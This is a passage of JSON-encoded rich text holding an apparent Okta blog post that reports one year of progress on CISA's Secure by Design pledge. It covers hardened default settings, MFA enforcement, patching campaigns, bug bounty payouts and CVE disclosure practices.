Nearly 300 technology companies have since signed the pledge, with most having made significant strides in documenting their progress toward these goals.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One year on, we’re taking a moment to reflect and share an update on Okta’s progress.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of Okta’s commitment to Secure by Design, the default configuration for all new Okta tenants has been hardened as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"New Default\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Details\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Context\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Date of change\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Creation of API Tokens\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrators are prompted for step-up 
authentication and prompted to assign an IP allowlist for all new SSWS API tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"May 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing Resistance\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication and account management policies in Okta Workforce Identity will enforce phishing resistance by default if users are enrolled in phishing-resistant authenticators.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step-Up Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions are enabled by default, ensuring step-up 
authentication is applied for policy modifications.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"April 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Maximum Global Session Lifetime\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default maximum Okta global session lifetime is now set to 24 hours.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reauthentication Frequency\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default reauthentication frequency in authentication policies was changed to one hour. 
\\n\\nThe option to force re-authentication “every time a user signs in to resource” is also labelled as the most secure option available in Okta Identity Engine.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025 in Okta Identity Engine\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Requirement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The default selection presented to administrators creating a new authentication policy in Okta Identity Engine is now “Any 2 factor types”.\\n\\nIn the Okta Classic Engine, MFA is now enabled by default in new app sign-on rules when MFA factors are available to users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\\n\\nMay 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session risk 
Evaluation\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User and entity session risk evaluations are now available in System Log for all accounts directly assigned with Super Administrator permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Administrative Users, Okta Identity Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Directory Agent Hardening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta directory agents now support end to end encryption and sender-constrained tokens using DPoP by default.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"July-\\nNovember 2024 in Okta Identity Engine\\n\\nJanuary 2025 in Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA 
Enforcement\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All new authentication policies for the Okta Admin Console require multi-factor authentication.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine, Okta Classic Engine and Auth0 Management Console\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP Session Binding\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By default, all API and web requests made to the Okta service by users with administrative permissions are bound to the device IP address recorded at the time of sign-in.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All Administrative Users, Okta Identity Engine and Okta Classic Engine\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 2024\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the Secure by Design pledge, Okta committed to measurable improvements in seven key areas identified by 
CISA. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s full-year update for each of those initiatives is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Driving Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has built on its best-in-class record for customer adoption of multi-factor authentication (MFA) among both users and administrators of Okta Workforce Identity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the one-year pledge, Okta had three primary goals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce MFA for all administrative access to management consoles,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive rapid adoption of high assurance, phishing-resistant authenticators such as Okta FastPass and FIDO2 passkeys,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce customer exposure to weaker 
authentication methods.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to the Okta Admin Console or the Auth0 Management console now requires multi-factor authentication (MFA). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reaching this milestone required an exhaustive program that restricted the ability for administrators to create a single factor authentication policy for the Okta Admin console, and worked closely with a large number of customers to ensure that their existing policies could meet this requirement prior to enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We identified early in the process that some customers needed more time to meet this requirement - especially customers that allowed inline MFA enrolment, used inbound federation or relied on certain configurations of third-party Privileged Access Management solutions to access the Okta Admin Console. Okta released several innovations, such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/configure-claims-sharing/oktaoidc/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticator claims sharing\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", to ensure MFA would always be applied, while maintaining a great experience for administrators. We thank these customers for taking this journey with us for the sake of our mutual security!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’re also very pleased to see rapid growth in high assurance, phishing-resistant authentication factors during the course of the pledge. 
According to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/blog/2025/03/businesses-at-work-2025/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Businesses at Work 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report, the volume of Okta FastPass authentications increased by 377% over 12 months. The total number of FastPass authentications backed by biometrics such as fingerprints or facial recognition increased by 288%. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the use of lower assurance authentication methods has declined: security questions by 12% and SMS/Voice Call by 14%.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Reducing the use of default passwords\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As noted at the halfway point of the pledge term, Okta did not feel it necessary to pursue any further changes regarding default passwords. Where on-premise appliances, clients or agents require default credentials at installation, Okta enforces the required rotation of these credentials at first sign-in.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. 
Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the start of the pledge term, Okta committed to initiating a company-wide campaign to drive down exposure to a particular class of vulnerability.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our first task was to classify vulnerabilities using a consistent methodology across the multiple products and services developed by Okta. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Product Security aggregated vulnerability data from all Auth0 and Okta products to create a single source of truth where vulnerability data could be normalized, analyzed, and classified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This analysis painted a clear picture of what required more focus: a subset of vulnerabilities classed as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Server Security Misconfigurations\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://bugcrowd.com/vulnerability-rating-taxonomy\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bugcrowd VRT\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For each shortlisted vulnerability, Product Security conducted “deep reviews” - technical investigations focused on specific vulnerability types, scoped for the entire codebase of Okta products, per their robust \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"secure development practices\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". The reviews identified several issues that have since been remediated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of this work, we developed and shared our methodology for reducing vulnerability classes. The methodology consists of distinct phases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Data Analysis - the aggregation, classification and trend analysis of vulnerability information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scope Definition and Plan Execution - prioritizing results from data analysis based on frequency and risk, creating action plans, and executing and tracking remediation.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Program improvements - creating standard trending metrics, vulnerability classification standardization, and shorter feedback 
loops.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This methodology was shared with the CISA Secure by Design working group. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Under the shared responsibility model for security, customers are accountable for maintaining up-to-date versions of client software. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The CISA Secure by Design pledge promotes adoption of a “shared fate” approach to customer patching, where service providers play a more active role in steering customers toward better security outcomes. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made measurable progress in our commitment to making it easy for customers to maintain up-to-date versions of client software.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the course of the pledge, we embarked on a campaign to convince customers to upgrade their AD (Active Directory) or LDAP agents to versions that include additional security controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As background, some Okta Workforce Identity customers choose to delegate primary authentication to on-premise directories such as Active Directory (AD) or LDAP. In these hybrid identity flows, users signing in to access cloud resources provide credentials that are forwarded to an agent running on a host on the customer’s network to check their validity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In these configurations, the integrity of the customer’s Okta implementation relies, to some degree, on the customer’s Active Directory hygiene. A disproportionate share of incidents reported by customers to Okta Identity Defence arise from an existing compromise of the customer’s Active Directory network.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In July 2024, Okta released a redesigned AD agent that adopted the “Demonstrating Proof of Possession” (DPoP) extension to OIDC, and added the same protection to the Okta LDAP agent from November 2024. While DPoP does not directly prevent a compromise of a Windows host, it can significantly reduce the blast radius for any compromise of the on-prem server(s) a customer uses to host these agents. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within 90 days of the release of the AD Agent, 44% of customers updated their agents to a version that included DPoP. A follow-up communications campaign, in which Okta mooted the possibility of removing support for versions that did not include these protections, drove adoption to 83%. The following version introduced support for end-to-end encryption.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also observed that one of the primary instruments to achieving stronger customer patching hygiene is the availability and uptake of “automatic update” features in any given product. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed that while customers are very comfortable with automatic update mechanisms in software deployed to end-user clients, we face more resistance when customers are asked to enable automatic updates in client-side software deployed to servers. There is legitimate concern among CISOs - largely based on adverse events at other vendors - as to whether suppliers adequately test updates for every possible customer configuration prior to their release. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the pledge, Okta ran direct-to-customer communications campaigns to assure customers of Okta’s strong record for stable updates. This drove a 6% increase in adoption. We continue to assess new ways of driving confidence in these controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. 
Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP) that authorizes testing by members of the public on products offered by the manufacturer, commits to not recommending or pursuing legal action against anyone engaging in good faith efforts to follow the VDP, provides a clear channel to report vulnerabilities, and allows for public disclosure of vulnerabilities in line with coordinated vulnerability disclosure best practices and international standards. \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has, as pledged, maintained 100% coverage of all Okta GA products in Bug Bounty programs and continues to publish a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/vulnerability-reporting-policy/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"vulnerability reporting policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/sites/default/files/2024-08/Okta_Vulnerability_Disclosure_Policy_v2.0.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosure policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From May 2024 to May 2025, Okta triaged 153 valid issues submitted via bug bounty programs and paid out $405,801 in total rewards.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"During the term of the 
pledge, Okta ran several “bounty reward multiplier” campaigns in which vulnerability researchers were paid double, and in some cases triple the financial reward for finding vulnerabilities in specific products. This attracted a number of new security researchers to our bug bounty program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the pledge, demonstrate transparency in vulnerability reporting by including accurate Common Weakness Enumeration (CWE) and Common Platform Enumeration (CPE) fields in every Common Vulnerabilities and Exposures (CVE) record for the manufacturer’s products. Additionally, issue CVEs in a timely manner for, at minimum, all critical or high-impact vulnerabilities that either require actions by a customer to patch or have evidence of active exploitation.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has formalized our approach to sharing vulnerability information with customers during the term of the pledge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We continue to remediate vulnerabilities discovered in Okta products in accordance with the contractual terms entered into with customers. Okta publishes CVEs when a vulnerability discovered in an Okta component requires action on the part of an Okta customer. Okta is a CVE Numbering Authority (CNA) authorized by CISA and MITRE to publish vulnerability information as CVE (Common Vulnerabilities and Exposures) bulletins. 
CVE bulletins for customer-installed Okta clients and agents are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://trust.okta.com/security-advisories/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published online\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has also revised its process for notifying customers of vulnerability information for a broader set of vulnerability types. All reported vulnerabilities are subject to both a technical assessment and an assessment of potential customer impact.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Within one year of signing the 